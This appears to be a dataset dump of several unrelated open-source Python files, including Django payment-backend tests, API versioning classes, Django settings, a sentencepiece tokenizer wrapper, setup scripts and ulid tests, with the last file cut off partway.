text
stringlengths 4
1.02M
| meta
dict |
---|---|
from decimal import Decimal
from mock import Mock, patch
from hashlib import md5
from django.db.models.loading import get_model
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.utils import six
from django.core.exceptions import ImproperlyConfigured
from getpaid.backends.transferuj import PaymentProcessor
from getpaid.backends import transferuj
from getpaid_test_project.orders.models import Order
from getpaid_test_project.orders.factories import PaymentFactory
from getpaid.utils import get_backend_settings
if six.PY3:
unicode = str
class TransferujBackendTestCase(TestCase):
def test_online_not_allowed_ip(self):
self.assertEqual('IP ERR',
PaymentProcessor.online('0.0.0.0', None, None, None, None, None,
None, None, None, None, None, None))
#Tests allowing IP given in settings
with self.settings(GETPAID_BACKENDS_SETTINGS={
'getpaid.backends.transferuj': {'allowed_ip': ('1.1.1.1', '1.2.3.4'), 'key': ''},
}):
self.assertEqual('IP ERR',
PaymentProcessor.online('0.0.0.0', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
PaymentProcessor.online('1.1.1.1', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
PaymentProcessor.online('1.2.3.4', None, None, None, None,
None, None, None, None, None, None,
None))
#Tests allowing all IP
with self.settings(GETPAID_BACKENDS_SETTINGS={
'getpaid.backends.transferuj': {'allowed_ip': [], 'key': ''},
}):
self.assertNotEqual('IP ERR',
PaymentProcessor.online('0.0.0.0', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
PaymentProcessor.online('1.1.1.1', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
PaymentProcessor.online('1.2.3.4', None, None, None, None,
None, None, None, None, None, None,
None))
def test_online_wrong_sig(self):
self.assertEqual('SIG ERR',
PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'xxx'))
self.assertNotEqual('SIG ERR',
PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'21b028c2dbdcb9ca272d1cc67ed0574e'))
def test_online_wrong_id(self):
self.assertEqual('ID ERR',
PaymentProcessor.online('195.149.229.109', '1111', '1', '', '1',
'123.45', None, None, None, None, None,
'15bb75707d4374bc6e578c0cbf5a7fc7'))
self.assertNotEqual('ID ERR',
PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'f5f8276fbaa98a6e05b1056ab7c3a589'))
def test_online_crc_error(self):
self.assertEqual('CRC ERR',
PaymentProcessor.online('195.149.229.109', '1234', '1', '',
'99999', '123.45', None, None, None, None,
None, 'f5f8276fbaa98a6e05b1056ab7c3a589'))
self.assertEqual('CRC ERR',
PaymentProcessor.online('195.149.229.109', '1234', '1', '',
'GRRGRRG', '123.45', None, None, None,
None, None,
'6a9e045010c27dfed24774b0afa37d0b'))
def test_online_payment_ok(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '123.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('123.45'))
def test_online_payment_ok_over(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '223.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('223.45'))
def test_online_payment_partial(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '23.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'partially_paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('23.45'))
def test_online_payment_failure(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '23.45', '',
False, 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'failed')
class PaymentProcessorGetGatewayUrl(TestCase):
def setUp(self):
self.payment = PaymentFactory()
self.pp = PaymentProcessor(self.payment)
def update_settings(self, data):
settings = get_backend_settings('getpaid.backends.transferuj')
settings.update(data)
return {'getpaid.backends.transferuj': settings}
def get_geteway_data(self):
settings = self.update_settings({'method': 'post'})
with self.settings(GETPAID_BACKENDS_SETTINGS=settings):
url, method, data = self.pp.get_gateway_url(Mock())
return data
def test_return_types(self):
settings = self.update_settings({'method': 'get'})
with self.settings(GETPAID_BACKENDS_SETTINGS=settings):
url, method, data = self.pp.get_gateway_url(Mock())
self.assertEquals(method, 'GET')
self.assertEquals(data, {})
self.assertIsInstance(url, str)
def test_default_config_url_transaction_params(self):
data = self.get_geteway_data()
crc = data['crc']
kwota = data['kwota']
id_ = data['id']
key = PaymentProcessor.get_backend_setting('key')
md5sum = six.text_type(id_) + kwota + six.text_type(crc) + key
md5sum = md5sum.encode('utf-8')
self.assertEquals(crc, self.payment.pk)
self.assertEquals(kwota, six.text_type(self.payment.amount))
self.assertEquals(id_, 1234)
self.assertEquals(data['md5sum'], md5(md5sum).hexdigest())
def test_default_config_url_data_params(self):
data = self.get_geteway_data()
self.assertEquals(data['email'], '[email protected]')
self.assertIn('opis', data)
self.assertNotIn('jezyk', data)
def get_urls(self):
return {
'wyn_url': reverse('getpaid-transferuj-online'),
'pow_url_blad': reverse('getpaid-transferuj-failure',
kwargs={'pk': self.payment.pk}),
'pow_url': reverse('getpaid-transferuj-success',
kwargs={'pk': self.payment.pk}),
}
def test_default_config_url_urls(self):
data = self.get_geteway_data()
for key, u in self.get_urls().items():
str_ = data[key]
self.assertTrue(str_.endswith(u),
"{} not end with {}".format(str_, u))
@patch.object(transferuj, 'get_domain')
def test_domains_http(self, patch_domain):
patch_domain.return_value = 'test'
data = self.get_geteway_data()
for key in self.get_urls():
self.assertTrue(data[key].startswith('http://test/'))
@patch.object(transferuj, 'get_domain')
def test_domains_https(self, patch_domain):
patch_domain.return_value = 'test'
settings = self.update_settings({
'force_ssl_online': True,
'force_ssl_return': True,
})
with self.settings(GETPAID_BACKENDS_SETTINGS=settings):
data = self.get_geteway_data()
for key in self.get_urls():
str_ = data[key]
self.assertTrue(str_.startswith('https://test/'),
"{} not start with https://test/".format(str_))
def test_post(self):
settings = self.update_settings({'method': 'post'})
with self.settings(GETPAID_BACKENDS_SETTINGS=settings):
url, method, data = self.pp.get_gateway_url(Mock())
self.assertEquals(method, 'POST')
self.assertNotEquals(data, {})
def test_bad_type(self):
settings = self.update_settings({'method': 'update'})
with self.settings(GETPAID_BACKENDS_SETTINGS=settings):
with self.assertRaises(ImproperlyConfigured):
self.pp.get_gateway_url(Mock())
| {
"content_hash": "7068a82ee2d49bb44c7d3d3f81652199",
"timestamp": "",
"source": "github",
"line_count": 258,
"max_line_length": 121,
"avg_line_length": 51.84108527131783,
"alnum_prop": 0.4707289719626168,
"repo_name": "kamilglod/django-getpaid",
"id": "693a25abe5549e376ed5266a6054810e666bfa60",
"size": "13390",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "getpaid_test_project/getpaid_test_project/orders/tests/test_transferuj.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "6266"
},
{
"name": "Python",
"bytes": "163697"
}
],
"symlink_target": ""
} |
"""
Copied+modified from rest_framework.versioning, which is licensed under the BSD license:
*******************************************************************************
Copyright (c) 2011-2016, Tom Christie
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this
list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*******************************************************************************
"""
from __future__ import unicode_literals
import re
from django.utils.translation import ugettext_lazy as _
from api import exceptions
from api import settings as api_settings
from api.compat import unicode_http_header
# noinspection PyProtectedMember
from api.reverse import _reverse
from api.utils.mediatypes import MediaType
from api.utils.urls import replace_query_param
class BaseVersioning(object):
default_version = api_settings.DEFAULT_VERSION
allowed_versions = api_settings.ALLOWED_VERSIONS
version_param = api_settings.VERSION_PARAM
def determine_version(self, request, *args, **kwargs):
msg = '{cls}.determine_version() must be implemented.'
raise NotImplementedError(msg.format(
cls=self.__class__.__name__
))
# noinspection PyShadowingBuiltins
def reverse(self, viewname, args=None, kwargs=None, request=None, format=None, **extra):
return _reverse(viewname, args, kwargs, request, format, **extra)
def is_allowed_version(self, version):
if not self.allowed_versions:
return True
return (version == self.default_version) or (version in self.allowed_versions)
class AcceptHeaderVersioning(BaseVersioning):
"""
GET /something/ HTTP/1.1
Host: example.com
Accept: application/json; version=1.0
"""
invalid_version_message = _('Invalid version in "Accept" header.')
def determine_version(self, request, *args, **kwargs):
media_type = MediaType(request.accepted_media_type)
version = media_type.params.get(self.version_param, self.default_version)
version = unicode_http_header(version)
if not self.is_allowed_version(version):
raise exceptions.NotAcceptable(self.invalid_version_message)
return version
# We don't need to implement `reverse`, as the versioning is based
# on the `Accept` header, not on the request URL.
class URLPathVersioning(BaseVersioning):
"""
To the client this is the same style as `NamespaceVersioning`.
The difference is in the backend - this implementation uses
Django's URL keyword arguments to determine the version.
An example URL conf for two views that accept two different versions.
urlpatterns = [
url(r'^(?P<version>[v1|v2]+)/users/$', users_list, name='users-list'),
url(r'^(?P<version>[v1|v2]+)/users/(?P<pk>[0-9]+)/$', users_detail, name='users-detail')
]
GET /1.0/something/ HTTP/1.1
Host: example.com
Accept: application/json
"""
invalid_version_message = _('Invalid version in URL path.')
def determine_version(self, request, *args, **kwargs):
version = kwargs.get(self.version_param, self.default_version)
if not self.is_allowed_version(version):
raise exceptions.NotFound(self.invalid_version_message)
return version
# noinspection PyShadowingBuiltins
def reverse(self, viewname, args=None, kwargs=None, request=None, format=None, **extra):
if request.version is not None:
kwargs = {} if (kwargs is None) else kwargs
kwargs[self.version_param] = request.version
return super(URLPathVersioning, self).reverse(
viewname, args, kwargs, request, format, **extra
)
class NamespaceVersioning(BaseVersioning):
"""
To the client this is the same style as `URLPathVersioning`.
The difference is in the backend - this implementation uses
Django's URL namespaces to determine the version.
An example URL conf that is namespaced into two separate versions
# users/urls.py
urlpatterns = [
url(r'^/users/$', users_list, name='users-list'),
url(r'^/users/(?P<pk>[0-9]+)/$', users_detail, name='users-detail')
]
# urls.py
urlpatterns = [
url(r'^v1/', include('users.urls', namespace='v1')),
url(r'^v2/', include('users.urls', namespace='v2'))
]
GET /1.0/something/ HTTP/1.1
Host: example.com
Accept: application/json
"""
invalid_version_message = _('Invalid version in URL path. Does not match any version namespace.')
def determine_version(self, request, *args, **kwargs):
resolver_match = getattr(request, 'resolver_match', None)
if resolver_match is None or not resolver_match.namespace:
return self.default_version
# Allow for possibly nested namespaces.
possible_versions = resolver_match.namespace.split(':')
for version in possible_versions:
if self.is_allowed_version(version):
return version
raise exceptions.NotFound(self.invalid_version_message)
# noinspection PyShadowingBuiltins
def reverse(self, viewname, args=None, kwargs=None, request=None, format=None, **extra):
if request.version is not None:
viewname = self.get_versioned_viewname(viewname, request)
return super(NamespaceVersioning, self).reverse(
viewname, args, kwargs, request, format, **extra
)
# noinspection PyMethodMayBeStatic
def get_versioned_viewname(self, viewname, request):
return request.version + ':' + viewname
class HostNameVersioning(BaseVersioning):
"""
GET /something/ HTTP/1.1
Host: v1.example.com
Accept: application/json
"""
hostname_regex = re.compile(r'^([a-zA-Z0-9]+)\.[a-zA-Z0-9]+\.[a-zA-Z0-9]+$')
invalid_version_message = _('Invalid version in hostname.')
def determine_version(self, request, *args, **kwargs):
hostname, separator, port = request.get_host().partition(':')
match = self.hostname_regex.match(hostname)
if not match:
return self.default_version
version = match.group(1)
if not self.is_allowed_version(version):
raise exceptions.NotFound(self.invalid_version_message)
return version
# We don't need to implement `reverse`, as the hostname will already be
# preserved as part of the REST framework `reverse` implementation.
class QueryParameterVersioning(BaseVersioning):
"""
GET /something/?version=0.1 HTTP/1.1
Host: example.com
Accept: application/json
"""
invalid_version_message = _('Invalid version in query parameter.')
def determine_version(self, request, *args, **kwargs):
version = request.query_params.get(self.version_param, self.default_version)
if not self.is_allowed_version(version):
raise exceptions.NotFound(self.invalid_version_message)
return version
# noinspection PyShadowingBuiltins
def reverse(self, viewname, args=None, kwargs=None, request=None, format=None, **extra):
url = super(QueryParameterVersioning, self).reverse(
viewname, args, kwargs, request, format, **extra
)
if request.version is not None:
return replace_query_param(url, self.version_param, request.version)
return url
| {
"content_hash": "f68308707f0a8072e8c8af19a141dbc7",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 101,
"avg_line_length": 40.645933014354064,
"alnum_prop": 0.6799293702177751,
"repo_name": "erigones/esdc-ce",
"id": "af76702c63bf9fbed5aa30b13e212714193632e9",
"size": "8511",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api/versioning.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Awk",
"bytes": "2728"
},
{
"name": "C",
"bytes": "8581"
},
{
"name": "CSS",
"bytes": "146461"
},
{
"name": "DTrace",
"bytes": "2250"
},
{
"name": "Erlang",
"bytes": "18842"
},
{
"name": "HTML",
"bytes": "473343"
},
{
"name": "JavaScript",
"bytes": "679240"
},
{
"name": "Jinja",
"bytes": "29584"
},
{
"name": "PLpgSQL",
"bytes": "17954"
},
{
"name": "Perl",
"bytes": "93955"
},
{
"name": "Python",
"bytes": "3124524"
},
{
"name": "Ruby",
"bytes": "56"
},
{
"name": "SCSS",
"bytes": "82814"
},
{
"name": "Shell",
"bytes": "281885"
}
],
"symlink_target": ""
} |
import sys
from oslo_config import cfg
from oslo_log import log as logging
from oslo_reports import guru_meditation_report as gmr
from designate import service
from designate import utils
from designate import version
from designate.zone_manager import service as zone_manager_service
CONF = cfg.CONF
CONF.import_opt('workers', 'designate.zone_manager',
group='service:zone_manager')
CONF.import_opt('threads', 'designate.zone_manager',
group='service:zone_manager')
def main():
utils.read_config('designate', sys.argv)
logging.setup(CONF, 'designate')
gmr.TextGuruMeditation.setup_autorun(version)
server = zone_manager_service.Service(
threads=CONF['service:zone_manager'].threads)
service.serve(server, workers=CONF['service:zone_manager'].workers)
service.wait()
| {
"content_hash": "51da01250d3d5f05874106cec161b5e2",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 71,
"avg_line_length": 29.928571428571427,
"alnum_prop": 0.7303102625298329,
"repo_name": "grahamhayes/designate",
"id": "fa10073a823fe2e26e9ae156ad1d635af8ced519",
"size": "1494",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "designate/cmd/zone_manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2292184"
},
{
"name": "Ruby",
"bytes": "3933"
},
{
"name": "Shell",
"bytes": "25961"
}
],
"symlink_target": ""
} |
"""
Django settings for VetAppDjango project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
#python3 manage.py migrate --run-syncdb
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'pjt=bo&=nvv++87m1%8o5as4rrti8yzb2h*)w^f@%+av81kami'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'VetApp',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'VetAppDjango.urls'
# WSGI_APPLICATION = 'VetAppDjango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
DATE_FORMAT = ['%d %b %Y']
DATE_INPUT_FORMATS = ['%d %b %Y']
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
| {
"content_hash": "bab1b989e3f9096de052b00d01ed26aa",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 71,
"avg_line_length": 25.46788990825688,
"alnum_prop": 0.6887608069164265,
"repo_name": "mape90/VetAppDjango",
"id": "f7ea4e04c707be73af57828dd0a19479d21852c5",
"size": "2776",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "VetAppDjango/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "9874"
},
{
"name": "JavaScript",
"bytes": "8802"
},
{
"name": "Python",
"bytes": "63904"
}
],
"symlink_target": ""
} |
"""Parsing with public available ops.
This is a wrapper of sentencepiece ops for public release.
"""
from typing import List, Tuple
import tensorflow as tf
import tensorflow_text as tf_text
import sentencepiece as sentencepiece_processor
_EOS = 1
_SOS = 4
_NUM_SHIFT_TOKENS = 103
_NEWLINE_SYMBOL = "<n>"
def _check_tokenizer_type(tokenizer_type: str) -> Tuple[int, bool]:
"""Checks tokenizer_type, returns num_shift_tokens and has_newline."""
if tokenizer_type not in [
"sentencepiece",
"sentencepiece_newline",
"sentencepiece_noshift",
"sentencepiece_noshift_newline",
]:
raise ValueError("Unsupported tokenizer type: %s" % tokenizer_type)
num_shift_tokens = 0 if "noshift" in tokenizer_type else _NUM_SHIFT_TOKENS
has_newline = "newline" in tokenizer_type
return num_shift_tokens, has_newline
def encode(text: tf.Tensor,
max_len: int,
vocab_filename: str,
tokenizer_type: str,
has_length_token: bool = False,
add_eos: bool = True,
add_sos: bool = False) -> tf.Tensor:
"""Operation that encodes tensor text into tensor ids.
Args:
text: input text tensor.
max_len: max number of encoded ids.
vocab_filename: vocabulary filename.
tokenizer_type: type of encder.
has_length_token: whether text starts with a length token.
add_eos: whether add eos token at the end of sequence.
add_sos: whether to add sos token at the start of sequence.
Returns:
ids: encoded ids from text.
"""
num_shift_tokens, has_newline = _check_tokenizer_type(tokenizer_type)
sp_model = tf.io.gfile.GFile(vocab_filename, "rb").read()
tokenizer = tf_text.SentencepieceTokenizer(model=sp_model)
batch_size = tf.shape(text)[0]
if has_newline:
text = tf.strings.regex_replace(text, "\n", _NEWLINE_SYMBOL + " ")
if has_length_token:
segs = tf.strings.split(text, " ")
length_token = tf.sparse.slice(segs, [0, 0], [batch_size, 1])
length_token = tf.sparse.to_dense(length_token)
length_id = tf.strings.to_number(length_token, out_type=tf.int64)
text = tf.sparse.slice(segs, [0, 1], [batch_size, segs.dense_shape[1] - 1])
text = tf.sparse.to_dense(text)
text = tf.strings.reduce_join(text, axis=1, separator=" ")
text = tf.strings.strip(text)
ids = tokenizer.tokenize(text)
if add_eos:
eos = tf.fill([batch_size, 1], _EOS)
ids = tf.concat([ids, eos], axis=1)
ids = ids.to_tensor(default_value=0, shape=[batch_size, max_len])
ids = tf.where(ids > 1, ids + num_shift_tokens, ids)
ids = tf.cast(ids, tf.int64)
if has_length_token:
ids = tf.concat([length_id, ids[:, :-1]], axis=1)
if add_sos:
sos = tf.fill([batch_size, 1], _SOS)
ids = tf.concat([sos, ids[:, :-1]], axis=1)
ids = tf.reshape(ids, [batch_size, max_len])
return ids
def decode(ids: tf.Tensor, vocab_filename: str,
tokenizer_type: str) -> tf.Tensor:
"""Operation that decodes tensor ids into tensor text.
Args:
ids: tensor ids.
vocab_filename: vocabulary filename.
tokenizer_type: type of tokenizer.
Returns:
text: decoded tensor text from ids.
"""
num_shift_tokens, has_newline = _check_tokenizer_type(tokenizer_type)
sp_model = tf.io.gfile.GFile(vocab_filename, "rb").read()
tokenizer = tf_text.SentencepieceTokenizer(model=sp_model)
ids = tf.where(ids > 1 + num_shift_tokens, ids - num_shift_tokens, ids)
ids = tf.cast(ids, tf.int32)
text = tokenizer.detokenize(ids)
text = tf.reshape(text, [-1])
if has_newline:
text = tf.strings.regex_replace(text, _NEWLINE_SYMBOL, "\n")
text = tf.strings.regex_replace(text, "\n ", "\n")
return text
def create_text_encoder(tokenizer_type: str, vocab_filename: str):
"""Creates an encoder based on the vacob and tokenizer type."""
if tokenizer_type == "sentencepiece":
return SentencePieceEncoder(vocab_filename)
elif tokenizer_type == "sentencepiece_newline":
return SentencePieceEncoder(vocab_filename, newline_symbol=_NEWLINE_SYMBOL)
elif tokenizer_type == "sentencepiece_noshift":
return SentencePieceEncoder(vocab_filename, num_shift_tokens=0)
elif tokenizer_type == "sentencepiece_noshift_newline":
return SentencePieceEncoder(
vocab_filename, num_shift_tokens=0, newline_symbol=_NEWLINE_SYMBOL)
else:
raise ValueError("Unsupported encoder type: %s" % tokenizer_type)
class SentencePieceEncoder(object):
"""SentencePieceEncoder.
First two ids are pad=0, eos=1, rest ids are being shifted up by
num_shift_tokens. If newline_symbol is provided, will replace newline in
the text with that token.
"""
def __init__(self,
sentencepiece_model_file: str,
num_shift_tokens: int = _NUM_SHIFT_TOKENS,
newline_symbol: str = ""):
self._tokenizer = sentencepiece_processor.SentencePieceProcessor()
self._sp_model = tf.io.gfile.GFile(sentencepiece_model_file, "rb").read()
self._tokenizer.LoadFromSerializedProto(self._sp_model)
self._num_shift_tokens = num_shift_tokens
self._newline_symbol = newline_symbol
@property
def vocab_size(self) -> int:
return self._tokenizer.GetPieceSize() + self._num_shift_tokens
def encode(self, text: str) -> List[int]:
if self._newline_symbol:
text = text.replace("\n", self._newline_symbol + " ")
ids = self._tokenizer.EncodeAsIds(text)
ids = [i + self._num_shift_tokens if i > 1 else i for i in ids]
return ids
def decode(self, ids: List[int]) -> str:
ids = [
i - self._num_shift_tokens if i > 1 + self._num_shift_tokens else i
for i in ids
]
text = self._tokenizer.DecodeIds(ids)
if self._newline_symbol:
text = text.replace(self._newline_symbol, "\n").replace("\n ", "\n")
return text
| {
"content_hash": "6dff9f0c7f469f3ae189f051ed7aeed7",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 79,
"avg_line_length": 35.72222222222222,
"alnum_prop": 0.6690858821496457,
"repo_name": "google-research/pegasus",
"id": "c3f407a43a7d022af55a7e2170a5d71b8a154e68",
"size": "6373",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pegasus/flax/public_parsing_ops.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "112333"
},
{
"name": "HTML",
"bytes": "1952"
},
{
"name": "Python",
"bytes": "673550"
}
],
"symlink_target": ""
} |
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
readme = open('README.rst').read()
doclink = """
Documentation
-------------
The full documentation is at http://svtools.rtfd.org."""
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
setup(
name='svtools',
version='0.1.0',
description='A toolset for facilitating strutural variation detection studies',
long_description=readme + '\n\n' + doclink + '\n\n' + history,
author='Zhen Zhang',
author_email='[email protected]',
url='https://github.com/zhangzhen/svtools',
packages=[
'svtools',
],
package_dir={'svtools': 'svtools'},
include_package_data=True,
install_requires=[
],
license='MIT',
zip_safe=False,
keywords='svtools',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: Implementation :: PyPy',
],
)
| {
"content_hash": "a823c70b8ee0f1519268778022074751",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 83,
"avg_line_length": 27.76923076923077,
"alnum_prop": 0.6094182825484764,
"repo_name": "zhangzhen/svtools",
"id": "d3777eb845935ea74dbc4d45ebb3eb33a6aaa3be",
"size": "1467",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
from gevent import monkey
monkey.patch_all()
import os
import logging.config
import sys
from werkzeug.serving import run_simple
if __name__ == "__main__":
assert len(sys.argv) == 2, "Usage: pulsus <config_dir>"
config_dir = sys.argv[1]
# Must go 1st
logging.config.fileConfig(os.path.join(config_dir, 'logging.conf'))
logger = logging.getLogger(__name__)
from . import server
config = server.read_config(config_dir)
server = server.setup(config)
server_address = config.get('server', 'address')
server_port = config.getint('server', 'port')
logger.info("Pulsus started")
run_simple(server_address, server_port, server)
| {
"content_hash": "00e0a314c9321254e509e647acdb085a",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 71,
"avg_line_length": 25.923076923076923,
"alnum_prop": 0.6765578635014837,
"repo_name": "pennersr/pulsus",
"id": "d85909ed8dd0680ff496ae7f9d06ce182b99470c",
"size": "674",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pulsus/server/serve.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25909"
}
],
"symlink_target": ""
} |
"""
test_module
~~~~~~~~~~~
Tests for the :mod:`~ulid` module.
"""
import pytest
from ulid import consts
def test_min_timestamp_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MIN_TIMESTAMP` uses expected byte value.
"""
value = consts.MIN_TIMESTAMP
assert value == b'\x00\x00\x00\x00\x00\x00'
def test_max_timestamp_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MAX_RANDOMNESS` uses expected byte value.
"""
value = consts.MAX_TIMESTAMP
assert value == b'\xff\xff\xff\xff\xff\xff'
def test_min_randomness_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MIN_RANDOMNESS` uses expected byte value.
"""
value = consts.MIN_RANDOMNESS
assert value == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
def test_max_randomness_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MAX_RANDOMNESS` uses expected byte value.
"""
value = consts.MAX_RANDOMNESS
assert value == b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff'
def test_min_ulid_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MIN_ULID` uses expected byte value.
"""
value = consts.MIN_ULID
